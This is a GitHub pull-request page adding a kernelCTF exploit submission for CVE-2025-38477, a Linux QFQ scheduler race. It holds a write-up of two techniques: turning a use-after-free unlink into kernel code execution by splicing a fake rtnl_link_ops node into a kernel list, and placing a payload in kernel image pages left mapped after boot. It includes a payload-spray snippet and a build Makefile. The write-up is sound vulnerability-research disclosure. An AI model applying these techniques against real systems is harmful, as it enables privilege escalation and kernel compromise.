Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
35 commits
Select commit Hold shift + click to select a range
bd34894
Add kernelCTF CVE-2025-38477_cos
n132 Oct 21, 2025
a4829bf
Add deps for CVE-2025-38477: libx
n132 Oct 21, 2025
6e800d4
CVE-2025-38477: Update metadata
n132 Oct 21, 2025
4b31a65
CVE-2025-38477: Update metadata
n132 Oct 21, 2025
b965621
Add CVE-2025-38477_cos: Solve the dep issue
n132 Oct 21, 2025
e5ac2ae
Add CVE-2025-38477_cos: debug mode
n132 Oct 21, 2025
5fac98f
resubmit: retry the checks
n132 Oct 21, 2025
40a22a8
Update exploit.md
n132 Oct 22, 2025
57d112a
CI: Fix the timeout issue
n132 Oct 22, 2025
66ac3e2
Merge branch 'master' of https://github.com/n132/security-research
n132 Oct 22, 2025
7be891b
CI: Fix the timeout issue
n132 Oct 22, 2025
0fcb6a2
CI: Fix the timeout issue
n132 Oct 22, 2025
bbffd62
CI: Fix the timeout issue
n132 Oct 22, 2025
36c3d66
CI: Retest
n132 Oct 23, 2025
4ec38ce
More trial
n132 Oct 23, 2025
2a320ac
Update exploit.md
n132 Oct 23, 2025
f479e67
Update exploit.md with vulnerability details
n132 Oct 23, 2025
30e37be
CI: Retest
n132 Oct 23, 2025
97468cf
CI Reset & document format
WinMin Oct 28, 2025
467777b
Merge branch 'master' of https://github.com/n132/security-research
n132 Oct 28, 2025
7e35086
reset
n132 Oct 28, 2025
dfc301f
Update with correct kaslr leak
n132 Oct 28, 2025
5853450
Update with correct kaslr leak
n132 Oct 28, 2025
5431878
Make it debugable
n132 Oct 28, 2025
abe30f0
[v8ctf] Update v8CTF challenges
sroettger Oct 29, 2025
d17719b
fix: kaslr leaking
n132 Oct 29, 2025
a692b05
Merge branch 'google:master' into master
n132 Oct 29, 2025
bfb8a02
retry
n132 Oct 29, 2025
be58c7f
code for test
n132 Oct 29, 2025
2abb594
code for test
n132 Oct 29, 2025
bf5b241
code for test
n132 Oct 29, 2025
25ca9e8
code for test
n132 Oct 29, 2025
29ce9d7
retest
n132 Oct 29, 2025
929630c
retest
n132 Oct 29, 2025
6350546
[v8ctf] Update v8CTF challenges
sroettger Dec 3, 2025
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1,084 changes: 1,084 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/exploit.md

Large diffs are not rendered by default.

265 changes: 265 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/novel-techniques.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,265 @@
From UAF-Unlink to ACE: LL_ATK and NPerm
===============

By combining academic race-condition techniques, we reliably hit the bug and
obtain a use-after-free (UAF) on struct `qfq_aggregate`, which is in the
kmalloc-128 slab:

```c
struct qfq_aggregate {
struct hlist_node next; /* 0 0x10 */
u64 S; /* 0x10 0x8 */
u64 F; /* 0x18 0x8 */
struct qfq_group * grp; /* 0x20 0x8 */
u32 class_weight; /* 0x28 0x4 */
int lmax; /* 0x2c 0x4 */
u32 inv_w; /* 0x30 0x4 */
u32 budgetmax; /* 0x34 0x4 */
u32 initial_budget; /* 0x38 0x4 */
u32 budget; /* 0x3c 0x4 */
/* --- cacheline 1 boundary (64 bytes) --- */
int num_classes; /* 0x40 0x4 */

/* XXX 4 bytes hole, try to pack */

struct list_head active; /* 0x48 0x10 */
struct hlist_node nonfull_next; /* 0x58 0x10 */

/* size: 104, cachelines: 2, members: 13 */
/* sum members: 100, holes: 1, sum holes: 4 */
/* last cacheline: 40 bytes */
};
```

With an agg pointer referencing a freed object, classic strategies include
same-cache refill (kmalloc-128) or cross-cache exploitation. These are too heavy
if we are gonna try several thousands times and only confirm the race once we
build a UAF-read (e.g., by refilling with a readable struct). To win KernelCTF,
we design a much lighter path that starts from a UAF-free with an unlink and
requires only a KASLR base leak to reach arbitrary code execution. This combines
two novel techniques: `LL_ATK` and `NPerm`.

## UAF-Unlink

Given an agg pointing to freed-and-refilled object, we can free the refilled
object and trigger the unlink in `qfq_destroy_agg`:


```c
static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg)
{
hlist_del_init(&agg->nonfull_next);
q->wsum -= agg->class_weight;
if (q->wsum != 0)
q->iwsum = ONE_FP / q->wsum;

if (q->in_serv_agg == agg)
q->in_serv_agg = qfq_choose_next_agg(q);
kfree(agg);
}
```

The unlink action (`hlist_del_init(&agg->nonfull_next)`) provides an
arbitrary-address unlink primitive:

```c
static inline void __hlist_del(struct hlist_node *n)
{
struct hlist_node *next = n->next;
struct hlist_node **pprev = n->pprev;

WRITE_ONCE(*pprev, next);
if (next)
WRITE_ONCE(next->pprev, pprev);
}
```

Arbitrary-Address Unlink isn’t common in kernel exploits, but we show it’s
sufficient for Arbitrary-Code-Execution(ACE) when paired with our techniques.

Arbitrary-Address-Unlink on a kernel heap object (agg object for CVE-2025-38477)
means we can trigger the unlink option (e.g., `hlist_del_init`) and control its
parameter (e.g. agg->nonfull_next). With a UAF, this is straightforward:

- UAF to have a pointer pointing to a free-ed kernel heap object
- Refill the object with payload data (e.g. set qfq_aggregate->nonfull_next)
- UAF-Free the pointer to trigger unlink
- Unlink writes 8 bytes to an arbitrary address


So, Arbitrary-Address Unlink gives us an 8-byte arbitrary write. It’s not
arbitrary-length and might seem weak, and we may need a heap leak primitive.

In the following three sections we combine two novel techniques to gain ACE from
an arbitary UAF-Unlink without additional address leaking. There are two key
questions:
- Where to write (solved by `LL_ATK`)
- What to write (solved by `NPerm`)

## UAF Unlink Attack Targeting Linked Lists: LL_ATK


Idea. While reproducing CVE-2023-4623, I designed `LL_ATK` to resolve the “where
to write” problem in UAF-unlink exploits. The key is to treat arbitrary-address
unlink as a way to link an attacker-controlled (refilled) fake node into any
existing linked list. By writing the address of a crafted fake node into a valid
list, we later make legitimate code iterate that list and invoke function
pointers embedded in our fake node to archive code execution.


Example. In our exploit, we splice a fake node into the kernel’s `rtnl_link_ops`
list. If the fake node’s name field and layout are set properly, the kernel 's
traversal over rtnl_link_ops reaches our node and calls its function pointers.
Crucially, this path does not require a heap address leak.

```c
struct rtnl_link_ops {
struct list_head list; /* 0 0x10 */
const char * kind; /* 0x10 0x8 */
size_t priv_size; /* 0x18 0x8 */
struct net_device * (*alloc)(struct nlattr * *, const char *, unsigned char, unsigned int, unsigned int); /* 0x20 0x8 */
void (*setup)(struct net_device *); /* 0x28 0x8 */
bool netns_refund; /* 0x30 0x1 */

/* XXX 3 bytes hole, try to pack */

unsigned int maxtype; /* 0x34 0x4 */
const struct nla_policy * policy; /* 0x38 0x8 */
/* --- cacheline 1 boundary (64 bytes) --- */
int (*validate)(struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x40 0x8 */
int (*newlink)(struct net *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x48 0x8 */
int (*changelink)(struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0x50 0x8 */
void (*dellink)(struct net_device *, struct list_head *); /* 0x58 0x8 */
size_t (*get_size)(const struct net_device *); /* 0x60 0x8 */
int (*fill_info)(struct sk_buff *, const struct net_device *); /* 0x68 0x8 */
size_t (*get_xstats_size)(const struct net_device *); /* 0x70 0x8 */
int (*fill_xstats)(struct sk_buff *, const struct net_device *); /* 0x78 0x8 */
/* --- cacheline 2 boundary (128 bytes) --- */
unsigned int (*get_num_tx_queues)(void); /* 0x80 0x8 */
unsigned int (*get_num_rx_queues)(void); /* 0x88 0x8 */
unsigned int slave_maxtype; /* 0x90 0x4 */

/* XXX 4 bytes hole, try to pack */

const struct nla_policy * slave_policy; /* 0x98 0x8 */
int (*slave_changelink)(struct net_device *, struct net_device *, struct nlattr * *, struct nlattr * *, struct netlink_ext_ack *); /* 0xa0 0x8 */
size_t (*get_slave_size)(const struct net_device *, const struct net_device *); /* 0xa8 0x8 */
int (*fill_slave_info)(struct sk_buff *, const struct net_device *, const struct net_device *); /* 0xb0 0x8 */
struct net * (*get_link_net)(const struct net_device *); /* 0xb8 0x8 */
/* --- cacheline 3 boundary (192 bytes) --- */
size_t (*get_linkxstats_size)(const struct net_device *, int); /* 0xc0 0x8 */
int (*fill_linkxstats)(struct sk_buff *, const struct net_device *, int *, int); /* 0xc8 0x8 */

/* size: 208, cachelines: 4, members: 26 */
/* sum members: 201, holes: 2, sum holes: 7 */
/* last cacheline: 16 bytes */
};
```

`rtnl_link_ops` holds the callback table for each rtnetlink “link type” (e.g.,
ipvlan). When userspace asks the kernel to create/modify/delete a rtnetlink
device (via `RTM_NEWLINK`, `RTM_DELLINK`, etc.), the kernel scans the global
linked list of registered `rtnl_link_ops` and selects the entry whose `kind`
matches the user-provided type (e.g., "ipvlan"). If a UAF-unlink primitive lets
us splice a forged `rtnl_link_ops` node into that list (with a correctly
targeted `kind`). The subsequent rtnetlink operations will dispatch into
attacker-controlled function pointers, turning the UAF-unlink into arbitrary
code execution.


`LL_ATK` is not only limited on `rtnl_link_ops` but a strategy of using
UAF-Unlink. `LL_ATK` is a exploitation skill transforms UAF-Unlink to
fake node insertion and then Arbitrary-Code-Execution. Considering
the large use of linked lists, it can be used on lots of UAFs to make
exploitation easier. (e.g., CVE-2023-4623, where I first designed it). It solves
the problem of "where to write".

## Leave Payload next to Kernel Resource: `NPerm`

> Note: This is not an exploitation bug per se; we’ve reported it to the kernel
> hardening team and a patch discussion is ongoing.

In the `LL_ATK` setting, “what to write” is really “where to place the fake
node.” As we mentioned in previous section, `LL_ATK` doesn't require any heap
leak but only KASLR (Kernel Base) leak (it's not hard because of prefetch attack
currently). `NPerm` solved the problem to "leave our payload somewhere based on
KASLR(Kernel Base) to avoid additional leak".


`NPerm` exploits a long-standing (decades-old) kernel design issue. We (@n132
and @kyle) identified it in Spring 2025 and reported it to the kernel security
team. Some maintainers did not consider it a security vulnerability and
suggested submitting a hardening patch instead. That patch has not yet landed,
so the issue remains exploitable (e.g., in KernelCTF). We also noticed that
@XuaizaYa shows they independently described the same behavior in a [recent
write-up][5], without pinpointing the root cause.

> From our original email to kernel security team:
> I am writing to bring to your attention some security vulnerabilities
> I have discovered. These vulnerabilities allow users to allocate pages
> mapped to kernel image areas, which would make kernel exploitation
> easier, considering side-channel attacks.
>
> There are mainly 4 regions not removed from kernel image mapping after free:
> - [rodata_resource.end, data_resource.start]
> - [__init_begin, __init_end]
> - [__smp_locks, __smp_locks_end]
> - [_brk_end, hpage_align(__end_of_kernel_reserve)]
> User space processes can use mmap to get pages in these areas and
> leave their ROP chain on these pages so they can pivot the stack to
> these areas with leaked kernel text base (via side-channel attacks).

The root cause of the `NPerm`-vulnerability is that kernel release some pages
used during early boot stage but it didn't "UNMAP" these pages on kernel
resource areas. Therefore, if we get these pages back from memory and we can
still visit them through their "MAPPED" address on kernel resource.


It's super easy to use as we shown on the exploitation script:
```c
#define PAYLOAD_SPRAY_PAGES 0x10
#define PAGE_SIZE 0x1000
#define TOTAL_ALLOCATION (PAGE_SIZE * PAYLOAD_SPRAY_PAGES)

void nperm(){
// Drain memory to increase chance of getting pages from the target regions.
pgvAdd(1, 9, 0x610);
for(int i = 0; i < PAYLOAD_SPRAY_PAGES; i++){
// PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS
void* addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if(addr == MAP_FAILED)
break;
memcpy(addr, payload, sizeof(payload)); // Spray payload
}
pgvDel(1); // Release the memory
}
```

We use `pgv` allocation (not necessary but make it faster) to drain the memory
and then spray our payload by `mmap`. Then we can find our payload on the
following 4 regions:

- [rodata_resource.end, data_resource.start]
- [__init_begin, __init_end]
- [__smp_locks, __smp_locks_end]
- [_brk_end, hpage_align(__end_of_kernel_reserve)]


`NPerm` enables us to load our payload on a known address only with KASLR
(Kernel Base) leak, which solves "What to write" problem.


## LL_ATK × NPerm: From UAF-Unlink to Code Execution


Combining `LL_ATK` and `NPerm` dramatically simplifies exploitation. In our
case, once we had a `UAF-Unlink` primitive, the final exploit core (sans
comments) fit in ~16 lines. The two techniques are independent and reusable:
`LL_ATK` inserts a fake node into a targeted kernel list; `NPerm` lands the fake
node next to kernel resource area so we don't need additional kernel heap leak.

Summary: Together, `LL_ATK` + `NPerm` form a generic, practical pathway to
transform a UAF-Unlink into reliable arbitrary code execution.


[5]: https://blog.xmcve.com/2025/09/22/WMCTF2025-Writeup/#title-5
32 changes: 32 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-38477_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
# Vulnerability

CVE-2025-38477 is a race condition vulnerability in the Linux kernel.

It occurs when 'agg' is modified in `qfq_change_agg` (called during
`qfq_enqueue`) while other threads access it concurrently. Calling different
functions concurrently build different primitives. For example, `qfq_dump_class`
may trigger a NULL dereference, and `qfq_delete_class` may cause a
use-after-free.

Easy to trigger PoC: https://lore.kernel.org/all/aGIAbGB1VAX-M8LQ@xps/

## Requirements
- **Capabilities**: `CAP_NET_ADMIN` is required.
- **Kernel configuration**: `CONFIG_NET_SCHED` and `CONFIG_NET_SCH_QFQ` must be enabled.
- **User namespaces**: Required to obtain `CAP_NET_ADMIN` if not already available to the user.

## Introduction
- **Commit**: [462dbc9101ac](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=462dbc9101ac)
- **Description**: This commit introduced the "Quick Fair Queueing Plus Scheduler" (QFQ+) to the kernel in Linux 3.0-rc1.

## Fix
- **Commit**: [5e28d5a3f774](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5e28d5a3f774)

## Affected Versions
- Linux 3.0-rc1 to 6.16-rc6

## Subsystem
- Net scheduler

## Root Cause
- Race condition
Original file line number Diff line number Diff line change
@@ -0,0 +1,54 @@
# Makefile for CVE-2025-38477 exploit

CC = gcc
CFLAGS = -static -w
DBGFLAGS = -g
TARGET = exploit
SOURCE = exploit.c

# libx configuration - expects libx to be in ./libx directory
LIBX_DIR = ./libx
LIBX_LIB = $(LIBX_DIR)/libx.a
LIBX_INCLUDE = $(LIBX_DIR)

# Directly link the local static library to avoid conflicts with system libx
INCLUDES = -I$(LIBX_INCLUDE)

.PHONY: all clean check-libx libx

all: $(LIBX_LIB) $(TARGET)

# Check if libx directory exists
check-libx:
@if [ ! -d "$(LIBX_DIR)" ]; then \
echo "Error: libx directory not found at $(LIBX_DIR)!"; \
echo "Please ensure libx is present in the current directory"; \
exit 1; \
fi

# Build libx from local source
$(LIBX_LIB): check-libx
@echo "Building libx..."
@$(MAKE) -C $(LIBX_DIR)
@echo "libx is ready!"

# Convenience target to just build libx
libx: $(LIBX_LIB)

$(TARGET): $(SOURCE) $(LIBX_LIB)
$(CC) $(CFLAGS) $(INCLUDES) $(SOURCE) -o $(TARGET) $(LIBX_LIB)


# Debug build expected by CI workflow
.PHONY: exploit_debug
exploit_debug: $(SOURCE) $(LIBX_LIB)
$(CC) $(filter-out -s,$(CFLAGS)) $(DBGFLAGS) $(INCLUDES) \
$(SOURCE) -o exploit_debug $(LIBX_LIB)

clean:
rm -f $(TARGET)
rm -f exploit_debug
@if [ -d "$(LIBX_DIR)" ]; then \
echo "Cleaning libx..."; \
$(MAKE) -C $(LIBX_DIR) clean 2>/dev/null || true; \
fi
Binary file not shown.
Loading